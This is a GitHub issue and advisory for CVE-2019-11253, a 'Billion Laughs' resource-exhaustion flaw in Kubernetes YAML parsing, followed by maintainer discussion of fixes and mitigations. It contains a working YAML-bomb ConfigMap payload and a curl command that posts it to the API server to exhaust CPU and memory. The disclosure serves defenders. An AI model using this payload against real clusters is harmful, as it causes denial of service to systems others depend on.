Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack #83253

Closed
raesene opened this issue Sep 27, 2019 · 16 comments · Fixed by #83261

Comments

@raesene
Copy link

@raesene raesene commented Sep 27, 2019

CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy.

Affected versions:

  • Kubernetes v1.0.0-1.12.x
  • Kubernetes v1.13.0-1.13.11, resolved in v1.13.12 by #83436
  • Kubernetes v1.14.0-1.14.7, resolved in v1.14.8 by #83435
  • Kubernetes v1.15.0-1.15.4, resolved in v1.15.5 by #83434
  • Kubernetes v1.16.0-1.16.1, resolved in v1.16.2 by #83433

All four patch releases are now available.

Fixed in master by #83261

Mitigation:

Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server mitigates which users are able to trigger this vulnerability.

To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the attached file as rbac.yaml, and run:

kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions 

Note: this removes the ability for unauthenticated users to use kubectl auth can-i

If you are running a version prior to v1.14.0:

  • in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false
  • after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true

=============

Original description follows:

Introduction

Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question here

What happened:

When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a "Billion Laughs" attack which is quite well known as an XML parsing issue.

Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.

apiVersion: v1
data:
  a: &a ["web","web","web","web","web","web","web","web","web"]
  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
  name: yaml-bomb
  namespace: default

What you expected to happen:

Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl.

One note is that the original poster on Stackoverflow indicated that the resource consumption was in kube-apiserver but both tests I did (1.16 client against 1.15 Kubeadm cluster and 1.16 client against 1.16 kubeadm cluster) showed the CPU usage client-side.

How to reproduce it (as minimally and precisely as possible):

Get the manifest above and apply to a cluster as normal with kubectl create -f <manifest>. Use top or another CPU monitor to observe the quantity of CPU time used.

Anything else we need to know?:

Environment:

  • Kubernetes version (use kubectl version):

test 1 (linux AMD64 client, Kubeadm cluster running in kind)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"}

test 2 (Linux AMD64 client, Kubeadm cluster running in VMWare Workstation)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
@raesene

This comment has been minimized.

Copy link
Author

@raesene raesene commented Sep 27, 2019

/sig cli

@raesene

This comment has been minimized.

Copy link
Author

@raesene raesene commented Sep 27, 2019

To update based on ideas from @liggitt and @bgeesaman , it's also possible to use this issue to cause a denial of service to the kube-apiserver by using curl to POST the YAML directly to the API server, effectively bypassing the client-side processing.

Steps to reproduce.

  1. Save the YAML as a file called yaml_bomb.yml
  2. for a valid kubernetes cluster, run kubectl proxy
  3. from the directory with the YAML saved run curl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H "Content-Type: application/yaml" --data-binary @yaml_bomb.yml
  4. If your user has rights to create ConfigMap objects in the default namespaces, this should work
  5. Observe CPU/Memory usage in the API server(s) of the target cluster.
@raesene raesene changed the title Kubectl YAML parsing vulnerable to "Billion Laughs" Attack. Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack. Sep 27, 2019
@liggitt liggitt self-assigned this Sep 27, 2019
@jbeda

This comment has been minimized.

Copy link
Contributor

@jbeda jbeda commented Sep 27, 2019

Just saw this -- we should stop accepting yaml server side. Or have a "simple yaml" variant that gets rid of references.

Any real world usages of users sending yaml to the api server? Can we go JSON/proto only?

@mauilion

This comment has been minimized.

Copy link
Contributor

@mauilion mauilion commented Sep 27, 2019

Nice find!

@liggitt

This comment has been minimized.

Copy link
Member

@liggitt liggitt commented Sep 27, 2019

Any real world usages of users sending yaml to the api server? Can we go JSON/proto only?

I don't think we can simply drop a supported format. Disabling alias/anchor expansion or bounding allocations seem more reasonable. I have a fix in progress that does the latter.

@pjbgf

This comment has been minimized.

Copy link
Contributor

@pjbgf pjbgf commented Sep 28, 2019

Sounds like something that should be treated as a security issue (DoS) and have a CVE associated to it. That would help users to understand whether or not they are vulnerable to it.

@liggitt liggitt changed the title Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack. CVE-2019-11253: Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack. Sep 29, 2019
@liggitt liggitt added this to the v1.17 milestone Sep 29, 2019
@simonferquel

This comment has been minimized.

Copy link
Contributor

@simonferquel simonferquel commented Sep 30, 2019

I did a pr on go-yaml 1 year ago to mitigate this issue on some of our server side components: go-yaml/yaml#375. Hope it helps!

@roycaihw

This comment has been minimized.

Copy link
Member

@roycaihw roycaihw commented Sep 30, 2019

/assign @jktomer

@k8s-ci-robot

This comment has been minimized.

Copy link
Contributor

@k8s-ci-robot k8s-ci-robot commented Sep 30, 2019

@roycaihw: GitHub didn't allow me to assign the following users: jktomer.

Note that only kubernetes members, repo collaborators and people who have commented on this issue/PR can be assigned. Additionally, issues/PRs can only have 10 assignees at the same time.
For more information please see the contributor guide

In response to this:

/assign @jktomer

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

@anguslees

This comment has been minimized.

Copy link
Member

@anguslees anguslees commented Sep 30, 2019

I don't think we can simply drop a supported format.

I'm not disagreeing, but: We could drop yaml, and communicate that through Accept headers in an unambiguous way. On the other hand, claiming to accept "yaml" but then dropping support for some features of yaml seems harder for a client to respond to automatically :/

Also note we have patch variants like application/apply-patch+yaml that are probably vulnerable to this DoS too.

(I completely agree that almost no "legitimate" client is sending yaml with anchors, except maybe in a hypothetical CRD that is human authored and contains lots of internal duplication (argo pipeline??). I personally have no problems with nuking yaml anchor support, just as we also don't support !!foo, etc)

@liggitt

This comment has been minimized.

Copy link
Member

@liggitt liggitt commented Sep 30, 2019

Also note we have patch variants like application/apply-patch+yaml that are probably vulnerable to this DoS too.

yeah, it would be a fundamental patch to the yaml library, effective process-wide

@raesene

This comment has been minimized.

Copy link
Author

@raesene raesene commented Oct 1, 2019

It could be worth noting that following discussions with the maintainer and golang security team, a patch has been made for go-yaml which looks to address this kind of attack go-yaml/yaml@bb4e33b

chris-crone added a commit to chris-crone/compose-on-kubernetes that referenced this issue Oct 1, 2019
To mitigate against malicious YAML (as described here:
kubernetes/kubernetes#83253) we used a patched
version of yaml.v2. There is now a fix upstream so we can leverage that.

Signed-off-by: Christopher Crone <christopher.crone@docker.com>
chris-crone added a commit to chris-crone/compose-on-kubernetes that referenced this issue Oct 1, 2019
To mitigate against malicious YAML (as described here:
kubernetes/kubernetes#83253) we used a patched
version of yaml.v2. There is now a fix upstream so we can leverage that.

Signed-off-by: Christopher Crone <christopher.crone@docker.com>
navidshaikh added a commit to navidshaikh/client that referenced this issue Oct 15, 2019
 As per title, just to make sure we're not vulnerable to CVE-2019-11253.
 See kubernetes/kubernetes#83253.
markusthoemmes added a commit to openshift/knative-serving that referenced this issue Oct 15, 2019
See CVE-2019-11253 and kubernetes/kubernetes#83253.
knative-prow-robot added a commit to knative/client that referenced this issue Oct 15, 2019
As per title, just to make sure we're not vulnerable to CVE-2019-11253.
 See kubernetes/kubernetes#83253.
navidshaikh added a commit to navidshaikh/viper that referenced this issue Oct 16, 2019
Make sure we're not vulnerable to CVE-2019-11253.
See kubernetes/kubernetes#83253
sagikazarmark added a commit to spf13/viper that referenced this issue Oct 16, 2019
Make sure we're not vulnerable to CVE-2019-11253.
See kubernetes/kubernetes#83253
@liggitt liggitt changed the title CVE-2019-11253: Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack. CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack Oct 16, 2019
andrew-ni added a commit to vmware/container-service-extension-templates that referenced this issue Oct 23, 2019
- Added new photon template with Kubernetes 1.14.6 (latest) and weave 2.5.2
- Added new revision of ubuntu templates to fix CVE kubernetes/kubernetes#83253

- Ubuntu scripts: Added another network reload (More info: vmware/container-service-extension#432)

- Ubuntu scripts: Disabled ipv6 in ubuntu scripts, preventing connection errors related to ipv6

- Ubuntu scripts: Added these config options to `apt-get update` command:
    -o Acquire::Retries=3
    -o Acquire::http::No-Cache=True
    -o Acquire::http::Timeout=20
    -o Acquire::https::No-Cache=True
    -o Acquire::https::Timeout=20
    -o Acquire::ftp::Timeout=20

All the connection-based errors we’ve seen occur during apt-get update. These options give us more flexibility by retrying 3 times, and waiting 20 seconds for the connection before timing out.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.